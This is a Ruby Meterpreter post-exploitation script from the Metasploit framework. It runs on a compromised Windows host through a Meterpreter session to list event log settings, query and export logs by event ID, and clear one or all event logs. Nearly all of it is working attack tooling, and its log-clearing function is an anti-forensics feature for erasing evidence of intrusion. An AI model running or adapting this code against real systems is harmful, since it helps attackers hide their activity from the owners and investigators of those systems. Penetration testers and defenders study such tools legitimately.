## # WARNING: Metasploit no longer maintains or accepts meterpreter scripts. # If you'd like to imporve this script, please try to port it as a post # module instead. Thank you. ## # Author: Carlos Perez at carlos_perez[at]darkoperator.com #------------------------------------------------------------------------------- ################## Variable Declarations ################## @client = client eventlog_name = nil print_logs = false list_logs = false clear_logs = false local_log = false local_log_path = nil supress_print = false filter = '\d*' filter_string = "*" meter_type = client.platform opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu" ], "-i" => [ false, "Show information about Event Logs on the System and their configuration"], "-l" => [ true, "List a given Event Log."], "-c" => [ true, "Clear a given Event Log (or ALL if no argument specified)"], "-f" => [ true, "Event ID to filter events on"], "-s" => [ true, "Save logs to local CSV file, optionally specify alternate folder in which to save logs"], "-p" => [ false, "Supress printing filtered logs to screen"] ) ################## Function Declarations ################## # Usage Message Function #------------------------------------------------------------------------------- def usage(opts) print_line "Meterpreter Script for Windows Event Log Query and Clear." print_line(opts.usage) raise Rex::Script::Completed end # Wrong Meterpreter Version Message Function #------------------------------------------------------------------------------- def wrong_meter_version(meter = meter_type) print_error("#{meter} version of Meterpreter is not supported with this script!") raise Rex::Script::Completed end # Function for Enumerating EventLogs #------------------------------------------------------------------------------- def get_log_details logs_detail = Array.new eventlog_list.each do |log_name| # Create a hash to store the log info in (and throw default info in) log_detail = Hash.new log_detail[:name] = log_name log_detail[:retention] = "Disabled" log_detail[:size] = 0 log_detail[:number_of_records] = 0 key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\" if @client.sys.config.sysinfo['OS'] =~ /Windows 2003|.Net|XP|2000/ key = "#{key}Eventlog" else key = "#{key}eventlog" end begin unless (registry_getvaldata("#{key}\\#{log_name}","Retention") == 0) then log_detail[:retention] = "Disabled" end log_detail[:size] = registry_getvaldata("#{key}\\#{log_name}","MaxSize") # Open the event log eventlog = @client.sys.eventlog.open(log_name) log_detail[:num_of_records] = eventlog.length rescue log_detail[:num_of_records] = "Access Denied" end logs_detail << log_detail end return logs_detail end # Function for Printing Event Log Details #------------------------------------------------------------------------------- def print_log_details print_status("Retriving Event Log Configuration") tbl = Rex::Ui::Text::Table.new( 'Header' => "Event Logs on System", 'Indent' => 1, 'Columns' => [ "Name", "Retention", "Maximum Size", "Records" ]) eventlog_details = get_log_details eventlog_details.each do |log_detail| tbl << [log_detail[:name],log_detail[:retention],"#{log_detail[:size]}K",log_detail[:num_of_records]] end print_line("\n" + tbl.to_s + "\n") end # Function for doings queries of EventLogs #------------------------------------------------------------------------------- def list_logs(eventlog_name,filter,filter_string,logs,local_log,sup_print) begin event_data = "" csv_data = "EventID,Date,Data\n" log = @client.sys.eventlog.open(eventlog_name) log.each_backwards do |e| if e.eventid.to_s =~ /#{filter}/ if not sup_print print_status("EventID: #{e.eventid}") print_status("Date: #{e.generated}") print_status("Data:") e.strings.each do |l| l.split("\r\n").each do |ml| print_status("\t#{ml.chomp}") event_data << " #{ml.chomp}" end end print_status end csv_data << "#{e.eventid},#{e.generated},\"#{event_data}\"\n" event_data = "" end end rescue print_error("Failed to Open Event Log #{eventlog_name}") raise Rex::Script::Completed end if local_log log_file = File.join(logs, "#{eventlog_name}.csv") print_good("CSV File saved to #{log_file}") file_local_write(log_file,csv_data) end end # Function for clearing EventLogs #------------------------------------------------------------------------------- def clear_logs(log_name=nil) log_names = [] if log_name.nil? log_names = eventlog_list else log_names << log_name end log_names.each do |name| begin print_status("Clearing #{name}") event_log = @client.sys.eventlog.open(name) event_log.clear print_status("Event Log #{name} Cleared!") rescue print_error("Failed to Clear #{name}, Access Denied") end end return log_names end ################## Main ################## opts.parse(args) { |opt, idx, val| case opt when "-h" usage(opts) when "-i" print_logs = true print_log_details raise Rex::Script::Completed when "-c" clear_logs = true eventlog_name = val when "-l" list_logs = true eventlog_name = val when "-f" filter = val when "-s" local_log = true if File.directory?(val) local_log_path = val else print_error("Log folder #{val} does not exist!") raise Rex::Script::Completed end when "-p" supress_print = true end } # Check for Version of Meterpreter wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i # Print usage & exit if the user didn't specify an action # to default to just running for all logs) if !list_logs and !clear_logs and !print_logs usage(opts) end # Log Folder Creation #----------------------------------------------------------------------- #Get Hostname host = @client.sys.config.sysinfo["Computer"] # Create Filename info to be appended to downloaded files filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S") # Create a directory for any local logging if the user desires if local_log if local_log_path logs = ::File.join(local_log_path, Rex::FileUtils.clean_path(host + filenameinfo) ) else logs = ::File.join(Msf::Config.log_directory, "scripts", 'event_manager', Rex::FileUtils.clean_path(host + filenameinfo) ) end ::FileUtils.mkdir_p(logs) end # List the logs if the user desires if list_logs and eventlog_name list_logs(eventlog_name,filter,filter_string,logs,local_log,supress_print) else print_error("You must specify and eventlog to query!") end # Finally, clear the specified logs if the user desires if clear_logs if eventlog_name clear_logs(eventlog_name) else eventlog_list.each do |eventlog_name| print_status eventlog_name + ": " clear_logs(eventlog_name) end end end